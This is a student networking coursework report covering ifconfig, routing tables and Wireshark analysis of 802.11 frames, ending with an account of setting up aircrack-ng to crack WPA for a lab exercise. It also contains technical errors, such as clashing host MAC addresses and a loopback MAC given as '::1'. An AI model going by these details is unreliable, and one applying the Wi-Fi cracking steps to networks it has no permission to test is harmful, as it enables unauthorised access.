Data Communication | My Assignment Tutor

Data Communication
Lecturer: Liang Chen
Student: Borys Kubisty
Due: 12/05/2019
Submitted: 11/05/2019
Data Communications 21383564

Introduction

I hope you enjoy reading through all elements as much as I enjoyed learning and exploring different areas of this module.

Table of Contents

Introduction
Table of Contents
Element 1
  A1: Find out the MAC address and the allocated IP address for the active network interfaces
  A2: Do you have a loopback interface being showed? If it is, explain what are loopback interfaces and how they are used.
  A3: Explain the semantics of the output fields of the ifconfig command, the following fields in particular: UP, BROADCAST, MULTICAST, MTU
  A4: Explain what a netmask and how it is used only if you did not do so as part of A2
  A5: Describe a means to prevent the MAC address spoofing attack
  A6: Explain how the route table works by going through the meaning of each column of this table such as Destination, Gateway, Flags, Refs, Use, Netif, Expire.
  A7: What is the default gateway IP address?
  A8: Examine the active routing table and verify that if the default gateway route has been removed? Can other computers on LAN be reached?
  A9: Examine the active routing table and verify that if the default gateway route has been restored.
Element 2
  A1: What are the SSIDs of the two access points that are issuing most of the beacon frames in this trace?
  A2: What are the intervals of time between the transmissions of the beacon frames the linksys_ses_24086 access point? From the 30 Munroe St. access point?
  A3: What (in hexadecimal notation) is the source MAC address on the beacon frame from 30 Munroe St?
  A4: What (in hexadecimal notation) is the destination MAC address on the beacon frame from 30 Munroe St?
  A5: What (in hexadecimal notation) is the MAC BSS id on the beacon frame from 30 Munroe St?
  A6: The beacon frames from the 30 Munroe St access point advertise that the access point can support four data rates and eight additional “extended supported rates.” What are these rates?
  A7: Find the 802.11 frame containing the SYN TCP segment for this first TCP session (that downloads alice.txt).
  A8: Find the 802.11 frame containing the SYN, ACK segment for this TCP session.
  A9: What two actions are taken (i.e., frames are sent) by the host in the trace just after t = 49, to end the association with the 30 Munroe St AP that was initially in place when trace collection began? Looking at the 802.11 specification, is there another frame that you might have expected to see, but don’t see here?
  A10: Examine the trace file and look for AUTHENTICATION frames sent from the host to an AP and vice versa. How many AUTHENTICATION messages are sent from the wireless host to the linksys_ses_24086 AP (which has a MAC address of Cisco_Li_f5:ba:bb) starting at around t = 49?
  A11: Does the host want the authentication to require a key or be open?
  A12: Do you see a reply AUTHENTICATION from the linksys_ses_24086 AP in the trace?
  A13: At what times are there an AUTHENTICATION frame from the host to the 30 Munroe St. AP, and when is there a reply AUTHENTICATION sent from that AP to the host in reply?
  A14: At what time is there an ASSOCIATE REQUEST from host to the 30 Munroe St AP? When is the corresponding ASSOCIATE REPLY sent?
  A15: What transmission rates is the host willing to use? The AP?
  A16: What are the sender, receiver and BSS ID MAC addresses in these frames? What is the purpose of these two types of frames?
Element 3
  Initial attempt and router issues
  Further look into variables out of my control
  Attempting with VM
  Further look into driver issues when attempting with VM
  Trial and error until working method found
  Selected Method
  Conclusion
Evidence A
References

Element 1

A1: Find out the MAC address and the allocated IP address for the active network interfaces

Introduction

To begin answering this question, I will explain what MAC and IP addresses are and their purpose in a computer connected network.

The main difference can be explained when taking into account the OSI and TCP/IP models. In the link layer, MAC addresses are used in frame headers to identify source and destination. Similarly to the IP address, it is used for identification.

IP is used more for recognition in networks, therefore changing when connected to different machines. To conclude, a MAC address is used to transfer data between physical nodes, an IP address is more for recognition between networks, and both can be configured and changed / spoofed.

Going Further

Network connected devices have a MAC (Media Access Control) address. This type of address is allocated to devices and doesn’t normally change.
Devices can have many MAC addresses, as a single device may have multiple interfaces to connect to a network, e.g. Wi-Fi, Bluetooth, Ethernet. All those interfaces will have different MAC addresses. A MAC address is a 48-bit value written in hexadecimal (base 16, i.e. 0 to 9 and A to F), consisting of 12 characters [1]. The format below illustrates what a MAC address usually looks like:

> 0c:63:3a:e6:45:b9

MAC addresses are sometimes spoofed, or even manually changed by users, depending on hardware. Spoofing your MAC address can also be done manually and is gaining different use cases, such as in the new Android version, Android Q. Here is a statement about the upcoming update [2]:

“Android Q devices will now transmit a randomized MAC address by default, at all times, and for all communications”.

IP (Internet Protocol) addresses differ from MAC addresses in many ways. An IP address usually changes on a computer [3], and over time the computer will have had lots of them. Nevertheless, there is the ability to reserve a static IP address. Usually it is businesses who are hosting domains and need them to refer to a specific IP address [4]. There are currently two major versions of the Internet Protocol: IPv4 and IPv6. IPv4 is currently the more familiar version, having larger support than IPv6 due to existing longer. The format of an IPv4 address is four values from 0 to 255 separated by dots, as illustrated below.

> 192.168.0.1

However, there is one major and unavoidable problem of IPv4 compared to IPv6: available combinations. For IPv4, there are 4,294,967,296 (32-bit, hence 2^32), compared to the massive 340,282,366,920,938,463,463,374,607,431,768,211,456 that IPv6 supports [3].

To begin the question and find the MAC and IP address, I will be using the available terminal on my machine.
In the terminal, to find the MAC address and other network interface specific information you can use the following command:

> ifconfig

This command is a system administration utility in UNIX and UNIX-like operating systems [5], working on operating systems like macOS and distros of Linux. By running this command on my machine, I am able to get my active network interfaces. Evidenced in a screenshot below.

I have two active network interfaces. I have documented the MAC and IP address for both of them in the table below.

Interface | MAC               | IP
enp0s3    | 08:00:27:56:8e:e7 | 10.0.2.15
lo        | ::1               | 127.0.0.1

I will be mentioning why the lo network interface differs from the regular MAC address format in the next section. If you add the option -a to the ifconfig command, you will get a list of all interfaces, active or inactive. Evidenced in a screenshot on the right.

From this, we can deduce that all my network interfaces are in the active state.

In addition, with this command, you can look up a single network interface by entering the name of the network interface after the ifconfig command, e.g. (evidenced in a screenshot below)

> ifconfig enp0s3

A2: Do you have a loopback interface being showed? If it is, explain what are loopback interfaces and how they are used.

On my machine, the second item in the list of network interfaces is an interface with the name of lo. This is normally a name for a loopback network interface.

The reason why the MAC address differed from the usual format is that a loopback interface is a virtual interface [6]. Unlike a physical network interface such as a NIC (network interface card / controller), it doesn’t actually exist in the machine. There is a chance that the IP of the loopback interface is localhost [8]. You can also use this when you are targeting your PC for networking matters, e.g. ping, or if you have a local web server running on your machine (localhost:6789/welcome.html).

Inner communication is a significant use case of a loopback network interface [14]. Programs (/ servers, etc.) which need to connect to the device they are on can connect through the loopback network interface to a server that is running on the machine.

There are three other use cases for the loopback interfaces [7].

1. Identification
2. Routing
3. Filtering

Identification

Devices supporting TCP (Transmission Control Protocol) and IP use the virtual interface to “validate the functional state” of the particular device [6]. Essentially, its usage is for the identification of the device, as other network interfaces may be disconnected from the device for a number of reasons, e.g. change in network topology [7] (change in the network and/or network configuration). An important note is that using the loopback interface as a way to identify the device from the IP is a mistake, as there can be mismatches [7]. By pinging the loopback interface, you may be presented with misleading results.

Routing

The loopback interface is used for information about the route in a network [7], more accurately, device or network specific properties which the device and / or network has been configured to issue to any interaction with a device, e.g. requesting information for a routing algorithm (i.e. OSPF, Open Shortest Path First).

Filtering

It is also used in packet filtering in the firewall [7]. The routing engine is able to distinguish where packets are from, and if they are for the machine.

These are not the only uses; however, they are notable.

A3: Explain the semantics of the output fields of the ifconfig command, the following fields in particular: UP, BROADCAST, MULTICAST, MTU.

I’d like to mention that it was necessary for me to have ‘admin’ privileges to perform some commands.
In Ubuntu, the Linux distribution I am using, instead of there being administrator accounts / users, you can give an account / user ‘root’ privilege. To perform commands that require this, I performed the following command:

> sudo -i

This required me to input my password and then converted my terminal session to run as root. This is evidenced in a screenshot below.

UP

The semantic UP works in conjunction with DOWN. To demonstrate the usage of the semantic UP, I will also be using DOWN. In order to understand the purpose, we need to note that an interface can have an on and off state. The semantics UP and DOWN essentially allow for the state to be on or off, or more accurately described as its state being available / active or not available / not active respectively. When we use the semantic DOWN, it will make the interface not available, having a state of being down, and when we use the semantic UP, it will make the interface available, having the state of being up [9].

When running as root, I first used DOWN to make a network interface not available. Evidenced in a screenshot below.

Now it is expected that the network interface that I have made not available shouldn’t come up in the list of network interfaces when performing the ifconfig command (as this only shows available network interfaces). Evidenced in a screenshot below.

As we can see, there is only one network interface present, and the one we made not available is missing from the available list. In order to check that the network interface is marked as down and wasn’t unplugged, etc., I ran the ifconfig command with the -a option selected. Evidenced in a screenshot below.

Finally, we can restore functionality to our network interface by typing the following command.

> ifconfig enp0s3 up

Now if we list all of the available network interfaces, we can see that our network interface is back in the available list.
Evidenced in the screenshot below (boxes have been displayed on the screenshot to highlight the relevant network interface).

BROADCAST

A broadcast address has the same format as an IPv4 address, usually with the last digits being different for devices in the same network. We can see this with the image below.

The address which is specified is normally used with certain protocols which will broadcast to devices on the connected network [11]. This will be the address that will be used. Below is an example of setting a broadcast address on a network interface.

> ifconfig enp0s3 broadcast 10.0.2.213

If there is no argument specified when running the BROADCAST semantic, then the attribute will be set to IFF_BROADCAST [9]. The address above isn’t properly configured because it has no 255. When further looking at the network devices section of the Linux Programmer’s Manual, we are able to find the following [10]:

“IFF_BROADCAST Valid broadcast address set.”

MULTICAST

Multicast and broadcast are similar; they both output data to other devices. However, the key difference is that data isn’t going to all devices, but only the interested ones. With a multicast router, ‘members’ (devices) can be listed as a part of a group which is then used to send packets [12].

With a network interface, you are able to enable and disable multicast by writing multicast to enable and -multicast to disable [12]. Below is an example of how we would disable multicast for a network interface.

> ifconfig enp0s3 -multicast

To enable it again, we perform the following.

> ifconfig enp0s3 multicast

MTU

The Maximum Transmission Unit (MTU) is the maximum block of data that can be transmitted in a singular unit (in bytes) [15].
In the terminal, we are able to set that value for specific network interfaces with the MTU ifconfig command.

To explain how the MTU is relevant in network communication, let’s say we need to transfer 4000 bytes of data when our MTU is 1500 bytes, seen in an example on the right.

For instance, for the data to be transmitted through a network interface, we will need to divide it into chunks that have a maximum of 1500 bytes each. These packets are then sent in the chunks shown above rather than in a whole 4000-byte unit.

In addition, if we had an MTU of 1000 bytes, the chunks would differ in size and quantity; this can be seen on the right.

If we type ifconfig, we are able to pick up on the default (already defined value) maximum transmission unit for each interface.

However, we can go a step beyond and set it by using the following:

> ifconfig enp0s3 mtu 1000

After we execute the command, we are able to check the MTU with ifconfig. The following was shown, proving that we changed the value.

The major factor to consider when setting the MTU is how significant packet loss is in connections. For the 4000-byte transfer, if a packet fails to be received and therefore needs to be sent again, an MTU of 1500 will be sending a bigger packet than an MTU of 1000. It is more stress on the network; however, in this case, it is not significant.

We also need to consider that there is additional data sent for every packet. So, for more packets, more information is being sent: information that isn’t in the requested data but is necessary to get the data to where it needs to be.

There isn’t a definitive or best MTU to have; it depends on circumstance, and even then, it doesn’t affect the network considerably.

A4: Explain what a netmask and how it is used only if you did not do so as part of A2

Netmasks are used for network interfaces, to define the class and range of IP addresses [17]. Netmasks work as templates for which IPs can be classed.
There are two “states” for a netmask to be in per section of bits. The first is 255, marking this section of the IP as network bits, and the other is 0, marking the section of the IP as host bits [18].

With this information, and a relevant network configuration (and other machines using the connections), we can define a subnet for the network using the netmask method. The netmask lengths are segmented in 8 bits. Each section of the netmask would be 8 bits [16]. Segments are created which give the netmask the definition / classification, i.e.

Reference
Netmask | 255      | 255      | 255      | 255
Binary  | 11111111 | 11111111 | 11111111 | 11111111
Length  | 8        | 16       | 24       | 32

With one of the network interfaces on my computer, I was able to gather the following information about my netmask, etc. from the screenshot below.

IP      | 10  | 0   | 2   | 15
Netmask | 255 | 255 | 255 | 0

I have highlighted some values to explain the correlation between network and host bits, to emphasize how the 255 marks the network identifiers and 0 marks the host identifiers. Therefore, we can deduce the following.

• The network address (without hosts)
  o 10:0:2:
• The host address (for identification of the host only)
  o : : :15
• And also, how many machines are supported in the network
  o 254 theoretically available machines on the network (0 & 255 are reserved [16]).

The reason why all of the networks aren’t given a netmask of 255:0:0:0 is that there is only a finite number of addresses, and it would be wasteful if you were to have more slots than the devices you are using on a network.

All classifications are displayed below with the appropriate length.

Class A
Netmask | 255      | 0        | 0        | 0
Binary  | 11111111 | 00000000 | 00000000 | 00000000
Length  | 8        | –        | –        | –

Class B
Netmask | 255      | 255      | 0        | 0
Binary  | 11111111 | 11111111 | 00000000 | 00000000
Length  | 8        | 16       | –        | –

Class C
Netmask | 255      | 255      | 255      | 0
Binary  | 11111111 | 11111111 | 11111111 | 00000000
Length  | 8        | 16       | 24       | –

A5: Describe a means to prevent the MAC address spoofing attack

MAC address attacks are usually when a user is masquerading as another to bypass authentication [19]. In order to prevent the masquerading of an individual, we need a way to confirm whether the user requesting some type of data is the user they say they are. This could be done by using a username/email and password. Now, the requested data can only be accessed by a designated user, and it adds the additional functionality of the data being available from multiple locations.

An extra step for someone to confirm their identity is a viable solution (two-factor authentication). There are many ways in which this kind of system can be implemented. To additionally check whether the person is who they are claiming to be, biometric authentication can be considered. You can also get another device (which has previously been logged into, e.g. a mobile phone) to grant you access.

There is also another type of MAC address attack: when there is a denial of service (DoS) or distributed denial of service (DDoS) to interfere with the connection of a normal user [19]. This kind of attack would normally be done with de-authentication frames sent to a party to disconnect a user. This can also apply with the broadcast command, which is more disruptive [19]. This is more difficult to prevent, and the solution would depend on the type of application of the MAC address, e.g. whether it is to verify a serial key, or a user trying to log in, etc.

A6: Explain how the route table works by going through the meaning of each column of this table such as Destination, Gateway, Flags, Refs, Use, Netif, Expire.

Introduction

A routing table contains data about where to route a packet to the next destination / “hop” in the surrounding network. Each record in a routing table has different attributes in order to guide the machine, i.e. destination, gateway, flags, expire, etc. Routing tables are required for machines that use TCP/IP [20].
The following command will list all of the incoming and outgoing TCP and UDP network connections, host computer routing table information and interface statistics. To view the routing table of the machine, we can perform the net(work) stat(istics) command. To find the route table, I will be using the following command, the output of which is found below.

> netstat -r

This will list the following information about each route:

• Destination
• Gateway
• Flags
• Refs
• Use
• Netif
• Expire

Without this option (just performing netstat), we would be listing the connections that the machine has. From this machine, the IPv6 table is also available, screenshotted below.

Explaining Table

Information for the different types of data available for each route record [20].

Column: Destination
Explanation: The destination host / network.
Example: 127

Column: Gateway
Explanation: This address is the pointer to where the network can be reached [24].
Example: 127.0.0.1

Column: Flags
Explanation: The flags describe the state of the route. By looking at the manual for the command netstat, we can see what the flags mean. To look at the manual, you need to perform the following command:
> man netstat
See below table for the result, image [a].
Example: UCS
Explanation of instance:
“U”, Route usage / ‘UP’
“C”, Generate new route on use
“S”, Manually added
> Information gathered from manual.

Column: Refs
Explanation: Gives the current number of active uses for the route [23].
Example: 89

Column: Netif
Explanation: The network interface this route is related to [21].
Example: en0

Column: Expire
Explanation: Expire is the time in seconds remaining until the entry expires and is no longer used in the routing table [22].
Example: 1195

[a]:

A7: What is the default gateway IP address?

The default gateway IP address is the address of a device, e.g. router, that is contacted whenever there is a device on its network that needs to send or receive data from another network (device) [25]. To explain further, the default gateway is a router; it is like an access point (but not necessarily wireless) for devices on its network to communicate.
So, a default gateway to a node on a network is the router to communicate with by default.

In addition, a default gateway can be a computer, so in that situation a default gateway IP address might be that of a computer which has other internet capable nodes connected. This would then require the computer to have two types of connections.

1. Connection to the internet
2. Other devices that are connected to the internet but do not have an internet connection there; they need to transfer data through another node.

An example of this is shown on the right (coloured lines signify the default gateway IP and the red signifies the connection to outer networks / internet).

A8: Examine the active routing table and verify that if the default gateway route has been removed? Can other computers on LAN be reached?

Before executing the relevant command, this is what our routing table looks like:

To answer this question, I will begin by performing the delete command:

> route delete _

I will be replacing the _ (placeholder) with the name of the default gateway, i.e. default.

If we then list the routing table, we see that it has been deleted as the default is no longer present.

To prove this, I will be trying to access a site:

However, this doesn’t stop me having access to computers on the same network; I will still be able to access a website or network-attached storage device. Because I do not have anything hosted on another device, I am not able to demonstrate this.

A9: Examine the active routing table and verify that if the default gateway route has been restored.

Before executing the relevant command, this is what our routing table looks like:

To answer this question, I will begin by performing the add command:

> route add _ –

I will be replacing the _ (placeholder) with the destination, and the – (placeholder) with the gateway, 10.24.28.1, which is the address of my access point.
To conclude, we will be adding the gateway of 10.24.28.1 with the destination of default (name).

If we then list the routing table, we see that it has been added.

To prove this, I will be trying to access a site:

Element 2

A1: What are the SSIDs of the two access points that are issuing most of the beacon frames in this trace?

To search exactly how many packets are related to an SSID, I will be using the following command:

> wlan.ssid == ""

I have discovered that there were two main SSIDs which were sent to and from the access point / router, and they were the following:

• 30 Munroe St
• linksys12

The 30 Munroe device was responsible for 851 packets of 2364 (36.0%), evidenced in the screenshot below.

However, not all were beacon frames.

The linksys12 device was responsible for 24 packets of 2364 (1.0%), as evidenced in the screenshot below. Even though only 1.0% of the packets are relevant, this SSID is still the largest identifiable contributor to the packets.

A2: What are the intervals of time between the transmissions of the beacon frames the linksys_ses_24086 access point? From the 30 Munroe St. access point?

We can first gather the relevant data from the Wireshark capture by filtering on the SSID and looking for beacon frames.

– Comparing packet 9 and 11
  0.393174 – 0.290284 = 0.10289
– Comparing packet 11 and 13
  0.495032 – 0.393174 = 0.101858
– Finding the average
  (0.10289 + 0.101858) / 2 = 0.102374 seconds = ~ 0.1 seconds

Now let’s check the frame information in the frame:

• 30 Munroe St.
• linksys_ses_24086

Both of the access points have the same beacon interval of 0.102400 seconds.

A3: What (in hexadecimal notation) is the source MAC address on the beacon frame from 30 Munroe St?

To find the source MAC address, we can simply look at a beacon frame’s data.

In this instance, it is 00:16:b6:f7:1d:51. We know it is the source address because the BSS (basic service set) ID is the same.
Access points normally have the same BSS and source address if the data is sent from the access point. This is a broadcast message because the MAC address destination and receiver is only the hexadecimal value ff. All devices in range (network) will see this.

A4: What (in hexadecimal notation) is the destination MAC address on the beacon frame from 30 Munroe St?

Like in the previous question, this information is in the beacon frame’s data.

In this instance, it is ff:ff:ff:ff:ff:ff. In this situation, the beacon frame is for everyone who is able to receive the frame. This is normally on the network. This is called the broadcast address.

A5: What (in hexadecimal notation) is the MAC BSS id on the beacon frame from 30 Munroe St?

The BSS ID (basic service set ID) is the MAC address of the AP, similar to the source MAC address as it is derived from it. Again, we look at the beacon frame data to find the BSS ID.

In this instance, it is the same as the source address of the device sending the beacon frame, 00:16:b6:f7:1d:51.

A6: The beacon frames from the 30 Munroe St access point advertise that the access point can support four data rates and eight additional “extended supported rates.” What are these rates?

We need to look at the tagged parameters section of the IEEE 802.11 beacon frame.

I have extracted the information in a comprehensive manner into the following table.

Supported Rates: 1 Mbps, 2 Mbps, 5.5 Mbps, 11 Mbps
Extended Supported Rates: 6 Mbps, 9 Mbps, 12 Mbps, 18 Mbps, 24 Mbps, 36 Mbps, 48 Mbps, 54 Mbps

A7: Find the 802.11 frame containing the SYN TCP segment for this first TCP session (that downloads alice.txt).

The SYN TCP segment was found; it is frame 474 at 24.811093. It is shown below.

I will be splitting this question into different parts.

A7.1: What are three MAC address fields in the 802.11 frame? Which MAC address in this frame corresponds to the wireless host (give the hexadecimal representation of the MAC address for the host)?
To the access point? To the first-hop router?

To view all the MAC addresses that were sent with the frame, we can inspect the frame.

Below is a breakdown of all of the MAC addresses. Some of the MAC addresses appear multiple times. Given what we know about all the MAC addresses from the table below, and due to the hexadecimal (/ base 16), only features the following: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F.

An 802.11 frame will have three addresses,

– Address 1 which will be the access point
– Address 2 which will be the host
– Address 3 which will be the router (first hop).

In this case,

– The access point (address 1), will be the receiver address
– The host (address 2), will be the source address
– The router (address 3), will be the destination address

Address: 00:16:b6:f7:1d:51
– Receiver address
– BSS ID
Device: MAC address of the BSS (basic service set) and receiver of the frame. This is the MAC address of the access point.

Address: 00:16:b6:f4:eb:a8
– Destination address
Device: MAC address of the router which the host wants to communicate with / send the frame to. This is the MAC address of the router (first hop router).

Address: 00:13:02:d1:b6:4f
– Source address
– Transmitter address
– STA (station / client) address
Device: MAC address of the host sending the frame, and in this case, it is a wireless host.

A7.2: What is the IP address of the wireless host sending this TCP segment? What is the destination IP address?

We can see from the general frame view that the IP source and destination can be found.
I have highlighted the source address (wireless host sending the TCP segment), and also the destination IP address.

A7.3: Does this destination IP address correspond to the host, access point, first-hop router, or some other network-attached device?

We know that the destination IP address of the SYN frame will be the source IP address of the ACK, SYN frame.

In order to understand this, currently we know three possible addresses:

– 00:16:b6:f7:1d:51, receiver / BSS
– 00:16:b6:f4:eb:a8, destination
– 00:13:02:d1:b6:4f, source / transmitter

If we look at the ACK, SYN frame, we need to look at the MAC addresses and which of the addresses above is in the source address (as that is the destination of the initial frame). Below is what is in the source field of the ACK, SYN frame.

The address highlighted above is the MAC address of the destination of the SYN frame. Therefore, we know that the destination address corresponds to the router (first-hop), of which we know that the IP would be 128.119.245.12.

A8: Find the 802.11 frame containing the SYN, ACK segment for this TCP session.

The SYN TCP segment was found; it is frame 476 at 24.827751. It is shown below, responding to the initial request.

I will be splitting this question into different parts.

A8.1: What are three MAC address fields in the 802.11 frame? Which MAC address in this frame corresponds to the host? To the access point? To the first-hop router?

To view all the MAC addresses that were sent with the frame, we can inspect the frame.

This will follow a similar format to the previous question. In this case,

– The access point (address 1), will be the destination address
– The host (address 2), will be the BSS ID address
– The router (address 3), will be the source address

Below is a breakdown of all of the MAC addresses.
Some of the MAC addresses appear multiple times. MAC addresses are written in hexadecimal (base 16), so they only feature the following characters: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F.

| Address | Role | Device |
|---|---|---|
| 00:16:b6:f7:1d:51 | BSS ID; Transmitter address | MAC address of the access point that will be sending the data to the wireless host from the source address device. |
| 00:16:b6:f4:eb:a8 | Source address | MAC address of the router of the network which will want to send to the wireless host which first sent the SYN (for the wireless host, this would be the first-hop router). |
| 91:2a:b0:49:b6:4f | Receiver address; Destination address; STA (station / client) address | MAC address of the host, and in this case, it is a wireless host. |

A8.2: Does the sender MAC address in the frame correspond to the IP address of the device that sent the TCP segment encapsulated within this datagram?

Due to the format of MAC and IP addresses being different, the sender MAC address in the frame cannot correspond to the IP address of the device that sent the TCP segment.

It is not possible for the MAC address in the sender frame to correspond to the IP address of the TCP segment.

However, when considering IP addresses only, the SYN source IP is: 192.168.1.109 to the destination IP of: 128.119.245.12. After, the ACK, SYN frame includes the source IP of: 128.119.245.12 and the destination IP of: 192.168.1.109.

A9: What two actions are taken (i.e., frames are sent) by the host in the trace just after t = 49, to end the association with the 30 Munroe St AP that was initially in place when trace collection began? Looking at the 802.11 specification, is there another frame that you might have expected to see, but don’t see here?

Frame 1733 is an IP layer action, described with the protocol “DHCP”. The other is frame 1735 which is an 802.11 layer action, described with the protocol “802.11”.
This is documented and evidenced below in the image.

When a disassociation frame is successfully sent, the connection can still be “authenticated”. However, due to sending a de-authentication frame, disassociation is assumed, therefore it was not sent. Some network configurations allow for both disassociation and de-authentication frames to be sent, in the respective order.

A10: Examine the trace file and look for AUTHENTICATION frames sent from the host to an AP and vice versa. How many AUTHENTICATION messages are sent from the wireless host to the linksys_ses_24086 AP (which has a MAC address of Cisco_Li_f5:ba:bb) starting at around t = 49?

An authentication is when a device / host wants to join the access point’s BSS (basic service set). The devices will exchange frames to understand a given password. I have screenshotted some of the 15 frames which are sent from a wireless host (IntelCor_d1:b6:4f) to the access point (Cisco_Li_f5:ba:bb).

All the previous authentication frames are sent at t = 49. However, there are more authentication frames beyond that time. We find some at t = 53, evidenced below.

We find even more after, around t = 57 and beyond, i.e. frame 1921 to 2924 and 2122 to 2124.

A11: Does the host want the authentication to require a key or be open?

When looking at the contents of the frame packet, we can view the data in the 802.11 sector. For all of the authentication frames (at least for frames at t = 49), the authentication algorithm is the open system.

If we view what the authentication system consists of, we see that it consists of two communications [27]:

“First, an authentication request is sent from the mobile device that contains the station ID (typically the MAC address).”

“Next, an authentication response from the AP/router with a success or failure message.”

A12: Do you see a reply AUTHENTICATION from the linksys_ses_24086 AP in the trace?

There doesn’t seem to be a reply to the authentication request.
Nowhere can we see a frame that is replying to the authentication.

A13: At what times are there an AUTHENTICATION frame from the host to the 30 Munroe St. AP, and when is there a reply AUTHENTICATION sent from that AP to the host in reply?

Initial authentication frame at frame 2156, t = 63.168087 from the host to AP:

Reply frame at 2158, t = 63.169071 from the AP to host:

A14: At what time is there an ASSOCIATE REQUEST from host to the 30 Munroe St AP? When is the corresponding ASSOCIATE REPLY sent?

After the authentication process, there is then the association process. This is when the access point and host exchange frames in order to understand capabilities and configuration. In this situation, the initial associate frame at frame 2162, t = 63.169910 from the host to AP:

Reply frame at 2166, t = 63.192101 from the AP to host:

end of main questions, challenge questions start…

A15: What transmission rates is the host willing to use? The AP?

To answer this question, you will need to look into the parameter fields of the 802.11 wireless LAN management frame.

| All supported rates | Supported by host | Supported by AP | All extended supported rates | Supported by host | Supported by AP |
|---|---|---|---|---|---|
| 1 Mbps | Yes | Yes | 6 Mbps | No | Yes |
| 2 Mbps | Yes | Yes | 9 Mbps | No | Yes |
| 5.5 Mbps | Yes | Yes | 12 Mbps | No | Yes |
| 6 Mbps | Yes | No | 18 Mbps | No | Yes |
| 9 Mbps | Yes | No | 24 Mbps | Yes | Yes |
| 11 Mbps | Yes | Yes | 36 Mbps | Yes | Yes |
| 12 Mbps | Yes | No | 48 Mbps | Yes | Yes |
| 18 Mbps | Yes | No | 54 Mbps | Yes | Yes |

Evidence: Host, AP

A16: What are the sender, receiver and BSS ID MAC addresses in these frames? What is the purpose of these two types of frames?

Using Wireshark, we can filter out only probe request and response by performing the following command [28]:

> wlan.fc.type_subtype == 4 or wlan.fc.type_subtype == 5

The following is listed when executing the filter:

Probe request information:
• Sender: IntelCor_1f:57:13 (00:12:f0:1f:57:13)
• Receiver: Broadcast (ff:ff:ff:ff:ff:ff)
• BSS ID: Broadcast (ff:ff:ff:ff:ff:ff)

Probe response information:
• Sender: Cisco-Li_f7:1d:51 (00:16:b6:f7:1d:51)
• Receiver: IntelCor_1f:57:13 (00:12:f0:1f:57:13)
• BSS ID: Cisco-Li_f7:1d:51 (00:16:b6:f7:1d:51)

Probe request would be from a device trying to find access points in its area. The response would be from an access point, sending information that it is an available connection point. In a real-life situation, if a device is in range of a lot of different access points, if it were to send out a probe, it would get a response from all of the access points.

Element 3

My walkthrough of using aircrack has been with multiple machines and operating systems. I have final complete evidence of it working on a dual boot of a Linux distribution Mint on my personal Apple MacBook Pro Late 2013. I have documented the whole process under the selected method heading, with the aircrack process starting at Phase 6. Before that, I will be documenting my activity.

Initial attempt and router issues

At the beginning of the assessment 2 element 3, I raised an issue with my lecturer that I was unable to complete the element due to my lack of access to a supporting router. This was initially solved by the university letting me borrow a router.
In order for me to have WEP connectivity, I am required to either:
– Connect to an internet connection provided from my internet service provider, or
– Extend the range of a previous network.

Further look into variables out of my control

I was unable to complete the first option because the internet connection in my accommodation is secured and I wasn’t able to provide an internet connection to the router (setup always failed). I have also tried, with multiple networks, to extend the range of an initial network. However, there are a few issues with that. Firstly, I wasn’t able to extend the connection when the initial router has WPA, since it will automatically inherit the security protocol. Secondly, I tried to extend a connection of a network that didn’t exist. This way I was able to configure the network to have WEP security. This successfully enabled me to create a network. However, there was nothing I could have done: due to there being no connection to the internet, I wasn’t able to capture any meaningful data from the router.

After speaking to my lecturer, the element was changed to also include cracking the WPA and WPA2 protocols.

Attempting with VM

On this point, I am trying to use WPA on any router. Initially I have tried to perform the aircrack commands on my virtual machine on my personal laptop as that is where I mostly completed all my other elements. However, due to a virtualisation layer used by VirtualBox, all wireless connectivity was seen as an Ethernet signal. This essentially made it impossible for me to continue unless I have an external Wi-Fi adapter. So, trying to minimise the amount of installations, that is what I decided to buy. I went for the cheapest option on amazon.co.uk for under £10. This supported only 2.4GHz frequency, not 5GHz.

Further look into driver issues when attempting with VM

I have installed the drivers on macOS and Windows flawlessly.
On both it was a matter of going through the process after downloading the system version from the website. Though the process on Linux is significantly different. Depending on the Linux kernel version, there is a different download. The beta driver covers the more recent kernel version, and the main covers older versions of the kernel. However, I have tried both and had trouble.

The installation of this device requires you to configure, compile and then install the drivers for it to work. This is evidenced on the right from the official installation guide for the device. I was unable to run the make command (even after performing apt update and apt upgrade while in root). Therefore, I had to try another method.

Trial and error until working method found

I have decided to try and install other distributions as I need to install Linux on another machine. I have listed all variables (machines and operating systems) for this assignment, and why they haven’t worked.

Machine: Apple MacBook Pro
Installation Type: None
Operating System: macOS Mojave
Evaluation: I wasn’t able to use any tool (like airmon-ng or airodump-ng) except aircrack. This meant I wasn’t able to create a capture file with a WPA handshake included.

Machine: Apple MacBook Pro
Installation Type: Dual Boot
Operating System: Windows 10
Evaluation: I had trouble with the installation of aircrack-ng even after adding the program to the PATH. Air monitor (airmon-ng) wasn’t properly working, making Windows unusable for this part of the assessment.

Machine: Lenovo YOGA 530
Installation Type: Bootable USB
Operating System: Mint, Xubuntu
Evaluation: When trying to perform this assignment on the Lenovo YOGA 530, I couldn’t get the network interface to launch into monitor mode when in any Linux distro. I speculate this laptop doesn’t have a Wi-Fi card that supports monitor mode.
Machine: Apple MacBook Pro
Installation Type: Bootable USB
Operating System: Kali
Evaluation: In order to get general drivers for my specific version of MacBook’s wireless network interface card, I required the internet, and without an Ethernet port or adapter, I wasn’t able to get them.

Machine: Apple MacBook Pro
Installation Type: Bootable USB
Operating System: openSUSE
Evaluation: I tried to boot into openSUSE without installing it, however, in order for me to use the desktop environment (and terminal), it required me to complete an install on a disk. I wasn’t able to simply “try” this Linux distro unlike others.

Machine: Asus GL702VS
Installation Type: Bootable USB
Operating System: Mint
Evaluation: This was one of the methods where the network card had monitor mode available, enabling me to get some aircrack methods and screenshots proving it working. Screenshots of the whole process can be found at the end of my document under the Evidence A subheading. However, this was on a computer not available to me later on so I needed to find a system where I can fully complete the process.

Machine: Apple MacBook Pro
Installation Type: Dual Boot
Operating System: Mint
Evaluation: Perfect combination. A dual boot of Mint on an Apple MacBook Pro was the most smooth for me and the way I’ll be showing you.

Selected Method

I will try to make my process as simple and straightforward as possible yet comprehensive enough to understand each step as if you were to follow the guide. Due to the lack of a screenshotting tool during this entire process, i.e. when in BIOS/EFI or recovery mode, I will be noting important stages with screenshots from other sources.

Requirements:
– Spare USB drive, at least 8GB
– Free space on current machine, at least 15GB
– Due to there not being immediate support for the latest trackpads and keyboards on MacBooks (from my experience, 2017+), you will need a wired keyboard (and mouse if possible).

